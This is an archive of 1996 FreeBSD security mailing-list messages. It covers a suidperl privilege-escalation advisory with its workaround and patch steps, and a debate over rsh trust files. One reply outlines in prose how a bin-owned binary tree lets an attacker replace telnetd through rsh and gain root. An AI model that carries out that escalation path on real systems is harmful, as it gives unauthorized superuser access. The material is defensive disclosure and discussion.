maelstrom.Berkeley.EDU (8.6.12/8.6.12) id QAA28812; Thu, 27 Jun 1996 16:45:45 -0700 Date: Thu, 27 Jun 1996 16:45:45 -0700 From: Michael Constant Message-Id: <199606272345.QAA28812@maelstrom.Berkeley.EDU> To: guido@gvr.win.tue.nl, root@edmweb.com Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) Cc: freebsd-security@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > I'm using FreeBSD 2.1.0-RELEASE. Is it sufficent to remove the suid bit > from the suidperl binaries? Or do I also have to search for scripts with > the suid bit? Removing the setuid bit from the binaries is all you need. The kernel ignores the setuid bit on scripts -- that's why suidperl is necessary in the first place. - Michael Constant From owner-freebsd-security Thu Jun 27 22:41:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA08931 for security-outgoing; Thu, 27 Jun 1996 22:41:46 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA08918 for ; Thu, 27 Jun 1996 22:41:43 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA05517; Fri, 28 Jun 1996 07:41:28 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA07832; Fri, 28 Jun 1996 07:41:05 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.5/keltia-uucp-2.8) id BAA22624; Fri, 28 Jun 1996 01:37:20 +0200 (MET DST) From: Ollivier Robert Message-Id: <199606272337.BAA22624@keltia.freenix.fr> Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) To: root@edmweb.com (Steve Reid) Date: Fri, 28 Jun 1996 01:37:20 +0200 (MET DST) Cc: guido@gvr.win.tue.nl, freebsd-security@FreeBSD.ORG In-Reply-To: from Steve Reid at "Jun 27, 96 04:02:10 pm" X-Operating-System: FreeBSD 2.2-CURRENT ctm#2111 X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk It seems that Steve Reid said: > I'm using FreeBSD 2.1.0-RELEASE. Is it sufficent to remove the suid bit > from the suidperl binaries? Or do I also have to search for scripts with > the suid bit? Removing the setuid of suidperl is enough. Setuid scripts are not valid and the setuid bit is there only for suidperl. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996 From owner-freebsd-security Fri Jun 28 01:27:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA18119 for security-outgoing; Fri, 28 Jun 1996 01:27:14 -0700 (PDT) Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA18084; Fri, 28 Jun 1996 01:27:07 -0700 (PDT) Message-Id: <199606280827.BAA18084@freefall.freebsd.org> To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org Cc: freebsd-security@freebsd.org, first-teams@first.org From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:12.perl Date: Fri, 28 Jun 1996 01:22:00 -0700 (PDT) Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:12 Security Advisory FreeBSD, Inc. Topic: security compromise from perl (suidperl) utility Category: core and ports Module: perl Announced: 1996-06-28 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: 2.1-stable and 2.2-current as of 1996-06-03 FreeBSD only: no Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:12/ ============================================================================= I. Background FreeBSD ships perl version 4 as part of the base level system, in addition, a port for perl version 5 is also provided with a similar vulnerability. The vulnerability is specific to the suidperl flavors of perl installed on the system. This problem is present in all source code and binary distributions of FreeBSD version 2.0.5 and later released before 1996-05-21. This problem is not present in FreeBSD 2.0 and earlier versions of FreeBSD. II. Problem Description The authors of perl provide a "suidperl" program for proper processing of setuid perl scripts on systems where race conditions where setuid scripts could be exploited to gain unauthorized access. FreeBSD installs this suidperl program (and a link) as part of the standard installation. However, privilege processing done by this program does not take into account recent functionality extensions in the seteuid/setegid system calls. III. Impact This vulnerability can only be exploited by users with a valid account on the local system to easily obtain superuser access. This vulnerability is present on all systems with the _POSIX_SAVED_IDS functionality extension where suidperl has been installed. IV. Workaround One may simply disable the setuid bit on all copies of the setuid version of perl. This will close the vulnerability but render inoperable setuid perl scripts. No software currently shipping as part of FreeBSD relies on this functionality so the impact is only to third party software. As root, execute the commands: # chmod 111 /usr/bin/suidperl # chmod 111 /usr/bin/sperl4.036 In addition, if you have installed the perl5 port: # chmod 111 /usr/local/bin/suidperl # chmod 111 /usr/local/bin/sperl5.001 then verify that the setuid permissions of the files have been removed. The permissions array should read "-r-xr-xr-x" as shown here: # ls -l /usr/bin/s*perl* ---x--x--x 2 root bin 307200 Jun 1 17:16 /usr/bin/sperl4.036 ---x--x--x 2 root bin 307200 Jun 1 17:16 /usr/bin/suidperl and for the perl5 port: # ls -l /usr/local/bin/s*perl* ---x--x--x 2 root bin 397312 Jan 22 15:15 /usr/local/bin/sperl5.001 ---x--x--x 2 root bin 397312 Jan 22 15:15 /usr/local/bin/suidperl V. Solution *NOTE* A patch for perl is available directly from Larry Wall (the author of perl) which solves this vulnerability in a different fashion than the FreeBSD patches. You may apply either the FreeBSD patches, or Larry's patches, or both. The patches solve the problem via two different mechanisms. Patches are available which eliminate this vulnerability. The following patch should be applied to the system sources and suidperl should be rebuilt and reinstalled. Apply the patch, then: # cd /usr/src/gnu/usr.bin/perl/sperl # make depend # make all # make install A similar patch is also available for the perl5 port. Apply the following patch by moving it into the patch directory for the port distribution and rebuilding and installing perl5: # cd /usr/ports/lang/perl5 # cp /patch-a[ab] patches # make all # make install NOTE: These patches do NOT solve the vulnerability for FreeBSD 2.0 or 2.0.5. These only solve the problem for 2.1 and later. Patches specific to FreeBSD 2.0 and 2.0.5 are available at the URL listed at the top of this file. ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBMdOTfFUuHi5z0oilAQEVkAP/cVHgqsW4GNpShs4RDQYvAphA31vTNiE8 vrfyjpA1GQET/KycQe0xdQWaQ7FF6FwG5ieahHFypqFN2Ze8VW10EuWN/EFhfjh5 vFnCqOW5r84DraP3ttkdR6WKyQXDwt61QBGiO7FYa03Kz29v3n9TO7W0LS+pAhB1 cZZwEwUN318= =M6FK -----END PGP SIGNATURE----- From owner-freebsd-security Fri Jun 28 17:41:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA19413 for security-outgoing; Fri, 28 Jun 1996 17:41:12 -0700 (PDT) Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA19349 for ; Fri, 28 Jun 1996 17:39:48 -0700 (PDT) Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id RAA00458; Fri, 28 Jun 1996 17:38:58 -0700 From: Nathan Lawson Message-Id: <199606290038.RAA00458@kdat.calpoly.edu> Subject: Re: I need help on this one - please help me track this guy down! To: terry@lambert.org (Terry Lambert) Date: Fri, 28 Jun 1996 17:38:57 -0700 (PDT) In-Reply-To: <199606271830.LAA05468@phaeton.artisoft.com> from "Terry Lambert" at Jun 27, 96 11:30:17 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > > Seriously, you must be root to create a setuid root file. It doesn't > > > matter *how* you try to create it. > > > > A five dollar question Vince: > > > > does root have .rhosts in his home directory? What is to be found there? > > If he does, throw it away; it's enormously insecure. Similar with > > /etc/host.equiv et cetera. > > man ruserok > > The authentication for vouchsafe protocols (rcmd/rsh based protocols) > *specifically* ignores hosts.equiv and hosts.lpd for root. If root > does not have a .rhosts, then it is secure from vouchsafe attack this > way. Nice try, Terry, but since /bin and /usr/bin and all the binaries on the system are owned by bin, a hosts.equiv might as well allow root access. I can su to bin on my host, rsh over to victim, replace /usr/libexec/telnetd with a script, telnet to localhost, and have my script run as root. As I have said many times before, this is a vulnerable path to allowing normal users (in this case bin) more privileges than necessary. All binaries run as root MUST be owned by root. Any other protection is inadequate. -- Nate Lawson "There are a thousand hacking at the branches of CPE Senior evil to one who is striking at the root." CSL Admin -- Henry David Thoreau, 'Walden', 1854 From owner-freebsd-security Sat Jun 29 08:16:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA08214 for security-outgoing; Sat, 29 Jun 1996 08:16:29 -0700 (PDT) Received: from mole.mole.org (marmot.mole.org [204.216.57.191]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA08092 for ; Sat, 29 Jun 1996 08:15:05 -0700 (PDT) Received: (from mail@localhost) by mole.mole.org (8.6.12/8.6.12) id PAA00344 for ; Sat, 29 Jun 1996 15:15:05 GMT Received: from meerkat.mole.org(206.197.192.110) by mole.mole.org via smap (V1.3) id sma000339; Sat Jun 29 15:14:41 1996 Received: (from mrm@localhost) by meerkat.mole.org (8.6.11/8.6.9) id HAA27966; Sat, 29 Jun 1996 07:39:27 -0700 Date: Sat, 29 Jun 1996 07:39:27 -0700 From: "M.R.Murphy" Message-Id: <199606291439.HAA27966@meerkat.mole.org> To: nlawson@kdat.csc.calpoly.edu, terry@lambert.org Subject: Re: I need help on this one - please help me track this guy down! Cc: freebsd-security@freefall.freebsd.org Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Nice try, Terry, but since /bin and /usr/bin and all the binaries on the > system are owned by bin, a hosts.equiv might as well allow root access. Not on the systems that we have here that need to be secure, they're not. All system executables and directories are owned by root. And /tmp and /var/tmp are owned by user tmp and group tmp. Paranoia is healthy. Internal systems are setup loose, external systems are screwed down tight. Blatant tautology alert: Just because a system is shipped insecure doesn't mean it has to be left that way. -- Mike Murphy mrm@Mole.ORG +1 619 598 5874 Better is the enemy of Good